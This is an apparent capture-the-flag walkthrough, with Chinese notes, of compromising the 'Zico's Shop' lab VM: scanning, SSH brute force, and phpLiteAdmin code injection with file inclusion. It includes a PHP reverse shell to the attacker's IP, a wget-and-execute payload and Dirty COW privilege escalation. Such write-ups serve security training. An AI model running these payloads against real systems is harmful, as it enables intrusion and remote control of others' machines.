
sudo netdiscover -i eth0 -r 192.168.100.0/24

目标主机IP：192.168.100.153


sudo masscan --rate=10000 --ports 0-65535 192.168.100.153
	Discovered open port 22/tcp on 192.168.100.153                                 
	Discovered open port 40262/tcp on 192.168.100.153                              
	Discovered open port 80/tcp on 192.168.100.153                                 
	Discovered open port 111/tcp on 192.168.100.153          

sudo nmap -A 192.168.100.153
	22/tcp  open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
	80/tcp  open  http    Apache httpd 2.2.22 ((Ubuntu))
	111/tcp open  rpcbind 2-4 (RPC #100000)

whatweb 192.168.100.153
	http://192.168.100.153 [200 OK] Apache[2.2.22], Bootstrap, Country[RESERVED][ZZ], Email[feedback@startbootstrap.com,your-email@your-domain.com], HTML5, HTTPServer[Ubuntu Linux][Apache/2.2.22 (Ubuntu)], IP[192.168.100.153], JQuery, Script, Title[Zico's Shop], X-UA-Compatible[IE=edge]

dirsearch  -u http://192.168.100.153
	[22:37:02] 403 -  297B  - /.htaccess.bak1                                                        
	[22:37:02] 403 -  294B  - /.ht_wsr.txt          
	[22:37:02] 403 -  297B  - /.htaccess.orig
	[22:37:02] 403 -  299B  - /.htaccess.sample
	[22:37:02] 403 -  297B  - /.htaccess.save
	[22:37:02] 403 -  295B  - /.htaccess_sc
	[22:37:02] 403 -  297B  - /.htaccess_orig
	[22:37:02] 403 -  295B  - /.htaccessBAK
	[22:37:02] 403 -  296B  - /.htaccessOLD2
	[22:37:02] 403 -  298B  - /.htaccess_extra
	[22:37:02] 403 -  295B  - /.htaccessOLD
	[22:37:02] 403 -  287B  - /.htm            
	[22:37:02] 403 -  288B  - /.html
	[22:37:02] 403 -  297B  - /.htpasswd_test
	[22:37:03] 403 -  294B  - /.httr-oauth
	[22:37:03] 403 -  293B  - /.htpasswds
	[22:37:16] 200 -    1KB - /LICENSE                                                            
	[22:37:17] 200 -    1KB - /README.md                                               
	[22:37:49] 403 -  291B  - /cgi-bin/                                                              
	[22:37:54] 301 -  316B  - /css  ->  http://192.168.100.153/css/                              
	[22:37:56] 301 -  320B  - /dbadmin  ->  http://192.168.100.153/dbadmin/   
	[22:37:56] 200 -  918B  - /dbadmin/                
	[22:37:57] 403 -  287B  - /doc/                                     
	[22:37:57] 403 -  291B  - /doc/api/
	[22:37:57] 403 -  302B  - /doc/html/index.html 
	[22:37:57] 403 -  302B  - /doc/en/changes.html
	[22:37:57] 403 -  301B  - /doc/stable.version                
	[22:38:05] 200 -    3KB - /gulpfile.js                                                           
	[22:38:07] 301 -  316B  - /img  ->  http://192.168.100.153/img/               
	[22:38:07] 200 -    8KB - /index                                                                 
	[22:38:08] 200 -    8KB - /index.html                
	[22:38:10] 200 -    1KB - /js/                                                                   
	[22:38:21] 200 -  789B  - /package                                                               
	[22:38:21] 200 -  789B  - /package.json                                                          
	[22:38:31] 403 -  296B  - /server-status                                                         
	[22:38:31] 403 -  297B  - /server-status/         
	[22:38:40] 200 -    8KB - /tools                                                                 
	[22:38:43] 200 -    2KB - /vendor/                                                               
	[22:38:44] 200 -    0B  - /view.php         
	
hydra -L top500.txt -P top6000.txt  192.168.100.153  ssh  

sudo nikto -h 192.168.100.153 
	+ OSVDB-3268: /css/: Directory indexing found.
	+ OSVDB-3092: /css/: This might be interesting...
	+ OSVDB-3268: /img/: Directory indexing found.
	+ OSVDB-3092: /img/: This might be interesting...
	+ OSVDB-3233: /icons/README: Apache default file found.
	+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26
	+ /package.json: Node.js package file found. It may contain sensitive informati
	
dirb http://192.168.100.153 
	
searchsploit phpLiteAdmin

PHPLiteAdmin 1.9.3 - Remote PHP Code Injection                 | php/webapps/24044.txt

首先查看敏感的信息users表中info；
http://192.168.100.153/dbadmin/test_db.php?action=row_view&table=info

成功获取两个账户：
root   34kroot34
zico   zico2215@
尝试使用ssh登录失败
	
命令注入漏洞和文件包含漏洞的利用；
创建一个数据库：test_db；创建一个表：test_table，一个字段信息；

http://192.168.100.153/view.php?page=../../../../usr/databases/test_db
	
/var/www/html
echo '<?php $sock=fsockopen("192.168.100.143",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>' >shell.txt

注入
<?php system("wget 192.168.100.143/shell.txt -O /tmp/shell.php; php /tmp/shell.php");?>

将shell转换为交互式的tty
python -c 'import pty;pty.spawn("/bin/bash")'  

脏牛提权
wget 192.168.100.143/dirty.c
gcc -pthread dirty.c -o exp -lcrypt
./exp 123.com

firefart 123.com

在zizo的目录下发现了WordPress文件；
wp-config.php 文件是WordPress数据库的关键。数据库名、用户名、密码、位置都是在此设置。

